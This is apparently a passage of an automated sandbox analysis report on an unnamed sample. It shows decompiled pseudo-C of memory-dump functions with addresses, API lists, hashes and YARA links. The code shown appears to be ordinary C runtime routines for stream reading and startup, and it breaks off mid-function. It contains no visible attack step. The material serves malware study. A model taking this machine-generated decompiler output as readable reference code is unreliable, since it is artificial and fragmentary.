											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E00A553A7(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E00A553A7(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                                        0x00a579a5
                                                        0x00a579ac
                                                        0x00a579b4
                                                        0x00a579b9
                                                        0x00a579bf
                                                        0x00a579c2
                                                        0x00a579c4
                                                        0x00a579c7
                                                        0x00a579d6
                                                        0x00a579d9
                                                        0x00a579f3
                                                        0x00a579f5
                                                        0x00a579f8
                                                        0x00a57a0d
                                                        0x00a57a13
                                                        0x00a57a16
                                                        0x00a57a19
                                                        0x00a57a1c
                                                        0x00a57a21
                                                        0x00a57a23
                                                        0x00a57a2b
                                                        0x00a57a2d
                                                        0x00a57a3b
                                                        0x00a57a3c
                                                        0x00a57a42
                                                        0x00a57a44
                                                        0x00000000
                                                        0x00000000
                                                        0x00a57a2f
                                                        0x00a57a2f
                                                        0x00a57a37
                                                        0x00a57a39
                                                        0x00a57a46
                                                        0x00a57a47
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a57a39
                                                        0x00a57a2d
                                                        0x00a57a4d
                                                        0x00a57a54
                                                        0x00a57ad2
                                                        0x00a57ad3
                                                        0x00a57ad4
                                                        0x00a57ada
                                                        0x00a57adb
                                                        0x00a57adc
                                                        0x00a57ae4
                                                        0x00000000
                                                        0x00a57a56
                                                        0x00a57a56
                                                        0x00a57a5e
                                                        0x00a57a63
                                                        0x00a57a66
                                                        0x00a57a69
                                                        0x00a57a6c
                                                        0x00a57a6e
                                                        0x00a57a87
                                                        0x00a57a8a
                                                        0x00a57aa7
                                                        0x00a57aa7
                                                        0x00a57a8c
                                                        0x00a57a8c
                                                        0x00a57a8f
                                                        0x00000000
                                                        0x00a57a91
                                                        0x00a57a9e
                                                        0x00a57a9e
                                                        0x00a57a8f
                                                        0x00a57aac
                                                        0x00a57ab0
                                                        0x00000000
                                                        0x00a57ab2
                                                        0x00a57ab2
                                                        0x00a57ab4
                                                        0x00a57ab5
                                                        0x00a57ab6
                                                        0x00a57abc
                                                        0x00a57ac1
                                                        0x00a57ac4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a57ac4
                                                        0x00a57a70
                                                        0x00a57a70
                                                        0x00a57a71
                                                        0x00a57a72
                                                        0x00a57a7b
                                                        0x00a57ac6
                                                        0x00a57ac9
                                                        0x00a57acc
                                                        0x00a57ae6
                                                        0x00a57ae6
                                                        0x00a57ae9
                                                        0x00a57af4
                                                        0x00a57aeb
                                                        0x00a57aeb
                                                        0x00a57aeb
                                                        0x00a57aeb
                                                        0x00a57aeb
                                                        0x00000000
                                                        0x00a57aeb
                                                        0x00a57ae9
                                                        0x00a57a6e
                                                        0x00a579fa
                                                        0x00a579fa
                                                        0x00a579fd
                                                        0x00a57a00
                                                        0x00a57a82
                                                        0x00a57aef
                                                        0x00a57aef
                                                        0x00a57a02
                                                        0x00a57a05
                                                        0x00a57a05
                                                        0x00a57a08
                                                        0x00a57a0a
                                                        0x00000000
                                                        0x00a57a0a
                                                        0x00a57a00
                                                        0x00a579db
                                                        0x00a579db
                                                        0x00a579e0
                                                        0x00000000
                                                        0x00a579e0
                                                        0x00a579c9
                                                        0x00a579c9
                                                        0x00a579ce
                                                        0x00a579e6
                                                        0x00a579e6
                                                        0x00a579ea
                                                        0x00a579ea
                                                        0x00a57afc
                                                        0x00a579ae
                                                        0x00a579b2
                                                        0x00a579b2

                                                        APIs
                                                        • __ioinit.LIBCMT ref: 00A579A5
                                                          • Part of subcall function 00A56275: InitOnceExecuteOnce.KERNEL32(00A70438,00A562B0,00000000,00000000,00A533D0,00A6CE88,00000018,00A535AA,?,000000FF,00000001,?,00A51790,?), ref: 00A56283
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Once$ExecuteInit__ioinit
                                                        • String ID:
                                                        • API String ID: 129814473-0
                                                        • Opcode ID: 1bae72a45751eeddfabac374046f609086e6b1e36682929be0fa82f2f60e9612
                                                        • Instruction ID: 95d0e0c1b91e787a53071a513bce4b3eff35f4ddc3dc9ead2715141541a1ecea
                                                        • Opcode Fuzzy Hash: 1bae72a45751eeddfabac374046f609086e6b1e36682929be0fa82f2f60e9612
                                                        • Instruction Fuzzy Hash: 8C413671508B009ED3349F38E891A7E7BA5BF853B2B14871DEDA6E62D1D774D9088B10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A53388, Relevance: 7.7, APIs: 5, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E00A53388(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				signed int _t59;
				void* _t65;
				signed char** _t68;
				signed int _t69;
				void* _t70;
				signed char** _t73;
				signed char** _t74;
				signed int _t75;
				signed int _t76;
				signed int _t85;
				signed char* _t90;
				signed char* _t93;
				signed char* _t95;
				signed int _t100;
				signed int _t101;
				signed int _t105;
				signed int* _t107;
				void* _t108;
				signed int _t112;

				_push(0x18);
				_push(0xa6ce88);
				E00A554B0(__ebx, __edi, __esi);
				_t85 =  *(_t108 + 8);
				_t107 = _t85;
				_t105 = _t85;
				 *(_t108 - 0x1c) = _t105;
				_t112 = _t85;
				_t113 = _t112 != 0;
				if(_t112 != 0) {
					__eflags = 0 -  *(_t108 + 0xc);
					asm("sbb eax, eax");
					if(__eflags == 0) {
						goto L1;
					} else {
						_t51 = E00A56275( ~0x00000000);
						__eflags = _t51;
						if(_t51 < 0) {
							goto L2;
						} else {
							E00A52883(0, E00A5283E());
							 *((intOrPtr*)(_t108 - 4)) = 0;
							_t54 = E00A5283E();
							__eflags =  *(_t54 + 0xc) & 0x00000040;
							if(( *(_t54 + 0xc) & 0x00000040) == 0) {
								_t75 = E00A551D0(_t54);
								_t100 = _t75;
								__eflags = _t100 - 0xffffffff;
								if(_t100 == 0xffffffff) {
									L9:
									_t76 = 0xa6f600;
								} else {
									__eflags = _t100 - 0xfffffffe;
									if(_t100 == 0xfffffffe) {
										goto L9;
									} else {
										_t76 = ((_t75 & 0x0000001f) << 6) +  *((intOrPtr*)(0xa70c20 + (_t100 >> 5) * 4));
									}
								}
								__eflags =  *(_t76 + 0x24) & 0x0000007f;
								if(__eflags != 0) {
									L16:
									 *((intOrPtr*)(E00A553A7(__eflags))) = 0x16;
									E00A55155();
									_t105 = 0;
									 *(_t108 - 0x1c) = 0;
								} else {
									__eflags = _t100 - 0xffffffff;
									if(_t100 == 0xffffffff) {
										L14:
										_t100 = 0xa6f600;
									} else {
										__eflags = _t100 - 0xfffffffe;
										if(_t100 == 0xfffffffe) {
											goto L14;
										} else {
											_t100 = ((_t100 & 0x0000001f) << 6) +  *((intOrPtr*)(0xa70c20 + (_t100 >> 5) * 4));
										}
									}
									__eflags =  *(_t100 + 0x24) & 0x00000080;
									if(__eflags != 0) {
										goto L16;
									}
								}
							}
							__eflags = _t105;
							if(_t105 == 0) {
								L42:
								 *((intOrPtr*)(_t108 - 4)) = 0xfffffffe;
								E00A5358C(0);
								_t49 = _t105;
							} else {
								_t56 = E00A5283E();
								_t21 = _t56 + 4;
								 *_t21 =  *(_t56 + 4) - 1;
								__eflags =  *_t21;
								if( *_t21 < 0) {
									_t101 = E00A56147(0, _t100, _t107, E00A5283E());
								} else {
									_t74 = E00A5283E();
									_t95 =  *_t74;
									_t101 =  *_t95 & 0x000000ff;
									 *_t74 =  &(_t95[1]);
								}
								 *(_t108 - 0x20) = _t101;
								__eflags = _t101 - 0xffffffff;
								if(_t101 != 0xffffffff) {
									L23:
									_t59 =  *(_t108 + 0xc);
									__eflags = _t59 - 0xffffffff;
									if(_t59 != 0xffffffff) {
										 *(_t108 - 0x24) = _t59;
										while(1) {
											__eflags = _t101 - 0xa;
											if(_t101 == 0xa) {
												break;
											}
											__eflags = _t101 - 0xffffffff;
											if(_t101 != 0xffffffff) {
												__eflags = _t59;
												if(_t59 != 0) {
													_t69 = _t59 - 1;
													 *(_t108 + 0xc) = _t69;
													 *(_t108 - 0x24) = _t69;
													 *_t107 = _t101;
													_t107 =  &(_t107[0]);
													__eflags = _t107;
													 *(_t108 - 0x28) = _t107;
												}
												_t65 = E00A5283E();
												_t35 = _t65 + 4;
												 *_t35 =  *(_t65 + 4) - 1;
												__eflags =  *_t35;
												if( *_t35 < 0) {
													_t101 = E00A56147(0, _t101, _t107, E00A5283E());
												} else {
													_t68 = E00A5283E();
													_t90 =  *_t68;
													_t101 =  *_t90 & 0x000000ff;
													 *_t68 =  &(_t90[1]);
												}
												 *(_t108 - 0x20) = _t101;
												_t59 =  *(_t108 + 0xc);
												continue;
											}
											break;
										}
										__eflags = _t59;
										if(__eflags != 0) {
											goto L41;
										} else {
											 *( *(_t108 + 8)) = 0;
											 *((intOrPtr*)(E00A553A7(__eflags))) = 0x22;
											E00A55155();
											E00A56960(_t108, 0xa6f360, _t108 - 0x10, 0xfffffffe);
											goto L2;
										}
									} else {
										while(1) {
											__eflags = _t101 - 0xa;
											if(_t101 == 0xa) {
												break;
											}
											__eflags = _t101 - 0xffffffff;
											if(_t101 != 0xffffffff) {
												 *_t107 = _t101;
												_t107 =  &(_t107[0]);
												 *(_t108 - 0x28) = _t107;
												_t70 = E00A5283E();
												_t28 = _t70 + 4;
												 *_t28 =  *(_t70 + 4) - 1;
												__eflags =  *_t28;
												if( *_t28 < 0) {
													_t101 = E00A56147(0, _t101, _t107, E00A5283E());
												} else {
													_t73 = E00A5283E();
													_t93 =  *_t73;
													_t101 =  *_t93 & 0x000000ff;
													 *_t73 =  &(_t93[1]);
												}
												 *(_t108 - 0x20) = _t101;
												continue;
											}
											break;
										}
										L41:
										 *_t107 = 0;
										goto L42;
									}
								} else {
									_t105 = 0;
									 *(_t108 - 0x1c) = 0;
									__eflags =  *(_t108 + 0x10);
									if( *(_t108 + 0x10) != 0) {
										goto L42;
									} else {
										goto L23;
									}
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00A553A7(_t113))) = 0x16;
					E00A55155();
					L2:
					_t49 = 0;
				}
				return E00A554F5(_t49);
			}


























                                                        0x00a53388
                                                        0x00a5338a
                                                        0x00a5338f
                                                        0x00a53394
                                                        0x00a53397
                                                        0x00a53399
                                                        0x00a5339b
                                                        0x00a533a0
                                                        0x00a533a5
                                                        0x00a533a7
                                                        0x00a533c2
                                                        0x00a533c5
                                                        0x00a533c9
                                                        0x00000000
                                                        0x00a533cb
                                                        0x00a533cb
                                                        0x00a533d0
                                                        0x00a533d2
                                                        0x00000000
                                                        0x00a533d4
                                                        0x00a533dd
                                                        0x00a533e4
                                                        0x00a533e7
                                                        0x00a533ec
                                                        0x00a533f0
                                                        0x00a533f3
                                                        0x00a533f9
                                                        0x00a533fb
                                                        0x00a533fe
                                                        0x00a53419
                                                        0x00a53419
                                                        0x00a53400
                                                        0x00a53400
                                                        0x00a53403
                                                        0x00000000
                                                        0x00a53405
                                                        0x00a53410
                                                        0x00a53410
                                                        0x00a53403
                                                        0x00a5341e
                                                        0x00a53422
                                                        0x00a5344d
                                                        0x00a53452
                                                        0x00a53458
                                                        0x00a5345d
                                                        0x00a5345f
                                                        0x00a53424
                                                        0x00a53424
                                                        0x00a53427
                                                        0x00a53442
                                                        0x00a53442
                                                        0x00a53429
                                                        0x00a53429
                                                        0x00a5342c
                                                        0x00000000
                                                        0x00a5342e
                                                        0x00a53439
                                                        0x00a53439
                                                        0x00a5342c
                                                        0x00a53447
                                                        0x00a5344b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5344b
                                                        0x00a53422
                                                        0x00a53462
                                                        0x00a53464
                                                        0x00a53573
                                                        0x00a53573
                                                        0x00a5357a
                                                        0x00a5357f
                                                        0x00a5346a
                                                        0x00a5346a
                                                        0x00a5346f
                                                        0x00a5346f
                                                        0x00a5346f
                                                        0x00a53472
                                                        0x00a5348f
                                                        0x00a53474
                                                        0x00a53474
                                                        0x00a53479
                                                        0x00a5347b
                                                        0x00a5347f
                                                        0x00a5347f
                                                        0x00a53491
                                                        0x00a53494
                                                        0x00a53497
                                                        0x00a534a7
                                                        0x00a534a7
                                                        0x00a534aa
                                                        0x00a534ad
                                                        0x00a534f3
                                                        0x00a534f6
                                                        0x00a534f6
                                                        0x00a534f9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a534fb
                                                        0x00a534fe
                                                        0x00a53500
                                                        0x00a53502
                                                        0x00a53504
                                                        0x00a53505
                                                        0x00a53508
                                                        0x00a5350b
                                                        0x00a5350d
                                                        0x00a5350d
                                                        0x00a5350e
                                                        0x00a5350e
                                                        0x00a53511
                                                        0x00a53516
                                                        0x00a53516
                                                        0x00a53516
                                                        0x00a53519
                                                        0x00a53536
                                                        0x00a5351b
                                                        0x00a5351b
                                                        0x00a53520
                                                        0x00a53522
                                                        0x00a53526
                                                        0x00a53526
                                                        0x00a53538
                                                        0x00a5353b
                                                        0x00000000
                                                        0x00a5353b
                                                        0x00000000
                                                        0x00a534fe
                                                        0x00a53540
                                                        0x00a53542
                                                        0x00000000
                                                        0x00a53544
                                                        0x00a53547
                                                        0x00a5354e
                                                        0x00a53554
                                                        0x00a53564
                                                        0x00000000
                                                        0x00a53569
                                                        0x00a534af
                                                        0x00a534af
                                                        0x00a534af
                                                        0x00a534b2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a534b8
                                                        0x00a534bb
                                                        0x00a534c1
                                                        0x00a534c3
                                                        0x00a534c4
                                                        0x00a534c7
                                                        0x00a534cc
                                                        0x00a534cc
                                                        0x00a534cc
                                                        0x00a534cf
                                                        0x00a534ec
                                                        0x00a534d1
                                                        0x00a534d1
                                                        0x00a534d6
                                                        0x00a534d8
                                                        0x00a534dc
                                                        0x00a534dc
                                                        0x00a534ee
                                                        0x00000000
                                                        0x00a534ee
                                                        0x00000000
                                                        0x00a534bb
                                                        0x00a53571
                                                        0x00a53571
                                                        0x00000000
                                                        0x00a53571
                                                        0x00a53499
                                                        0x00a53499
                                                        0x00a5349b
                                                        0x00a5349e
                                                        0x00a534a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a534a1
                                                        0x00a53497
                                                        0x00a53464
                                                        0x00a533d2
                                                        0x00a533a9
                                                        0x00a533a9
                                                        0x00a533ae
                                                        0x00a533b4
                                                        0x00a533b9
                                                        0x00a533b9
                                                        0x00a533b9
                                                        0x00a53586

                                                        APIs
                                                        • __ioinit.LIBCMT ref: 00A533CB
                                                        • __filbuf.LIBCMT ref: 00A534E6
                                                          • Part of subcall function 00A553A7: __getptd_noexit.LIBCMT ref: 00A553A7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __filbuf__getptd_noexit__ioinit
                                                        • String ID:
                                                        • API String ID: 4181715072-0
                                                        • Opcode ID: bdd061140ed9f27e55b178fb3932ff650c5fe45874183eda9bcfc82f84f933e9
                                                        • Instruction ID: 07e0261ca25529c94af5bc27ae4b5d88a4b1bc8744ff0e5c79f07ffc2197560a
                                                        • Opcode Fuzzy Hash: bdd061140ed9f27e55b178fb3932ff650c5fe45874183eda9bcfc82f84f933e9
                                                        • Instruction Fuzzy Hash: 4F511A729046449ECF156FB89A4166C7AB17FD63B3B248359EC25DB2D2DB30CA0DC711
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A52E24, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00A52E24(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t114;
				signed int _t116;
				void* _t117;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t121 = _t99;
				if(_t99 != 0) {
					_t116 = _a20;
					__eflags = _t116;
					if(_t116 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00A56B40(_t99, 0, _a8);
							_t117 = _t117 + 0xc;
						}
						__eflags = _t116;
						if(__eflags == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							_t107 = _t78 % _a12;
							__eflags = _t97 - _t78 / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t114 = _a12 * _t97;
							__eflags =  *(_t116 + 0xc) & 0x0000010c;
							_t98 = _t114;
							if(( *(_t116 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t116 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t114;
							if(_t114 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t116 + 0xc) & 0x0000010c;
									if(( *(_t116 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00A56147(_t98, _t107, _t116, _t116);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t114 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E00A56B40(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00A553A7(__eflags))) = 0x22;
												L4:
												E00A55155();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t107 = _t110 + 1;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t116 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t107 = _t44;
												_t91 = _t98;
											} else {
												_t107 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t107;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00A551D0(_t116));
											_t88 = E00A56CE5();
											_t117 = _t117 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t116 + 0xc) =  *(_t116 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t116 + 0xc;
												 *_t64 =  *(_t116 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t116 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00A56AB2(_v8, _t104,  *_t116, _t94);
										_t88 = _v20;
										 *(_t116 + 4) =  *(_t116 + 4) - _t88;
										_t117 = _t117 + 0x10;
										_t98 = _t98 - _t88;
										 *_t116 =  *_t116 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t96 = _t74 | 0xffffffff;
					_t74 = _t96 / _a12;
					_t107 = _t96 % _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00A553A7(_t121))) = 0x16;
				goto L4;
			}




























                                                        0x00a52e2e
                                                        0x00a52e31
                                                        0x00a52e37
                                                        0x00a52e3a
                                                        0x00a52e3d
                                                        0x00a52e5a
                                                        0x00000000
                                                        0x00a52e5a
                                                        0x00a52e3f
                                                        0x00a52e44
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52e46
                                                        0x00a52e48
                                                        0x00a52e61
                                                        0x00a52e64
                                                        0x00a52e66
                                                        0x00a52e74
                                                        0x00a52e74
                                                        0x00a52e78
                                                        0x00a52e80
                                                        0x00a52e85
                                                        0x00a52e85
                                                        0x00a52e88
                                                        0x00a52e8a
                                                        0x00000000
                                                        0x00a52e8c
                                                        0x00a52e8c
                                                        0x00a52e91
                                                        0x00a52e94
                                                        0x00a52e96
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52e98
                                                        0x00a52e9b
                                                        0x00a52e9e
                                                        0x00a52ea5
                                                        0x00a52ea7
                                                        0x00a52eae
                                                        0x00a52ea9
                                                        0x00a52ea9
                                                        0x00a52ea9
                                                        0x00a52eb3
                                                        0x00a52eb6
                                                        0x00a52eb8
                                                        0x00a52fa1
                                                        0x00000000
                                                        0x00a52ebe
                                                        0x00a52ebe
                                                        0x00a52ebe
                                                        0x00a52ec5
                                                        0x00a52f06
                                                        0x00a52f06
                                                        0x00a52f08
                                                        0x00a52f73
                                                        0x00a52f79
                                                        0x00a52f7c
                                                        0x00a52fd3
                                                        0x00000000
                                                        0x00a52fd9
                                                        0x00a52f7e
                                                        0x00a52f81
                                                        0x00a52f83
                                                        0x00a52fa9
                                                        0x00a52fa9
                                                        0x00a52fad
                                                        0x00a52fb7
                                                        0x00a52fbc
                                                        0x00a52fc4
                                                        0x00a52e55
                                                        0x00a52e55
                                                        0x00000000
                                                        0x00a52e55
                                                        0x00a52f85
                                                        0x00a52f88
                                                        0x00a52f8a
                                                        0x00a52f8b
                                                        0x00a52f8c
                                                        0x00a52f8c
                                                        0x00a52f8d
                                                        0x00a52f90
                                                        0x00a52f93
                                                        0x00a52f96
                                                        0x00000000
                                                        0x00a52f96
                                                        0x00a52f0a
                                                        0x00a52f0c
                                                        0x00a52f30
                                                        0x00a52f35
                                                        0x00a52f3b
                                                        0x00a52f3d
                                                        0x00a52f3d
                                                        0x00a52f0e
                                                        0x00a52f10
                                                        0x00a52f16
                                                        0x00a52f28
                                                        0x00a52f28
                                                        0x00a52f28
                                                        0x00a52f2a
                                                        0x00a52f18
                                                        0x00a52f1d
                                                        0x00a52f1f
                                                        0x00a52f1f
                                                        0x00a52f2c
                                                        0x00a52f2c
                                                        0x00a52f3f
                                                        0x00a52f42
                                                        0x00000000
                                                        0x00a52f44
                                                        0x00a52f44
                                                        0x00a52f45
                                                        0x00a52f4f
                                                        0x00a52f50
                                                        0x00a52f55
                                                        0x00a52f58
                                                        0x00a52f5a
                                                        0x00a52fe1
                                                        0x00000000
                                                        0x00a52fe1
                                                        0x00a52f60
                                                        0x00a52f63
                                                        0x00a52fcf
                                                        0x00a52fcf
                                                        0x00a52fcf
                                                        0x00a52fcf
                                                        0x00000000
                                                        0x00a52fcf
                                                        0x00a52f65
                                                        0x00a52f65
                                                        0x00a52f67
                                                        0x00a52f67
                                                        0x00a52f6a
                                                        0x00a52f6d
                                                        0x00000000
                                                        0x00a52f6d
                                                        0x00a52f42
                                                        0x00a52ec7
                                                        0x00a52eca
                                                        0x00a52ecd
                                                        0x00a52ecf
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52ed1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52ed7
                                                        0x00a52ed9
                                                        0x00a52edb
                                                        0x00a52edd
                                                        0x00a52edd
                                                        0x00a52ee0
                                                        0x00a52ee3
                                                        0x00a52ee5
                                                        0x00000000
                                                        0x00a52eeb
                                                        0x00a52ef2
                                                        0x00a52ef7
                                                        0x00a52efa
                                                        0x00a52efd
                                                        0x00a52f00
                                                        0x00a52f02
                                                        0x00000000
                                                        0x00a52f02
                                                        0x00a52f99
                                                        0x00a52f99
                                                        0x00a52f99
                                                        0x00000000
                                                        0x00a52ebe
                                                        0x00a52eb8
                                                        0x00a52e8a
                                                        0x00a52e68
                                                        0x00a52e6d
                                                        0x00a52e6d
                                                        0x00a52e70
                                                        0x00a52e72
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52e72
                                                        0x00a52e4a
                                                        0x00a52e4f
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: d46bfde2dfa2f17436b3247908cce3d1f9aa91e899da55e5001ee66d5cef0f36
                                                        • Instruction ID: 665bb321c70e3a4bee3df4f850c9cbc32c1dcae04eb07e1e77dfe2411ec92a51
                                                        • Opcode Fuzzy Hash: d46bfde2dfa2f17436b3247908cce3d1f9aa91e899da55e5001ee66d5cef0f36
                                                        • Instruction Fuzzy Hash: 1351A431A007059BDB289F69D98176E7BB2BF52322F248729FC25972D0D770DD6D8B40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5BDDD, Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E00A5BDDD(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v32;
				signed int _t14;
				intOrPtr _t15;
				signed int _t17;
				signed int _t18;
				intOrPtr _t28;
				intOrPtr* _t33;
				intOrPtr* _t35;
				signed int* _t38;
				void* _t46;
				signed int _t48;
				signed int _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;

				_t46 = __edx;
				_t38 = _a4;
				_t63 = _t38;
				if(_t38 != 0) {
					 *_t38 =  *_t38 & 0x00000000;
					_t52 = _a12;
					_t48 = _a8;
					__eflags = _t48;
					if(_t48 == 0) {
						__eflags = _t52;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t52;
						if(__eflags == 0) {
							L13:
							_t33 = E00A553A7(__eflags);
							_t56 = 0x16;
							 *_t33 = _t56;
							E00A55155();
							_t15 = _t56;
							goto L10;
						} else {
							L4:
							__eflags = _t48;
							if(_t48 != 0) {
								 *_t48 = 0;
							}
							_t14 = E00A5BD59(_a16);
							_a4 = _t14;
							__eflags = _t14;
							if(_t14 == 0) {
								L15:
								_t15 = 0;
								goto L10;
							} else {
								_t17 = E00A57B00(_t14) + 1;
								 *_t38 = _t17;
								__eflags = _t52;
								if(_t52 == 0) {
									goto L15;
								} else {
									__eflags = _t17 - _t52;
									if(_t17 <= _t52) {
										_t18 = E00A5F398(_t48, _t52, _a4);
										__eflags = _t18;
										if(_t18 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E00A55180(_t38, _t46);
											asm("int3");
											_push(0xc);
											_push(0xa6d1c8);
											E00A554B0(_t38, _t48, _t52);
											_t54 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00A5FCCF(_t54, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
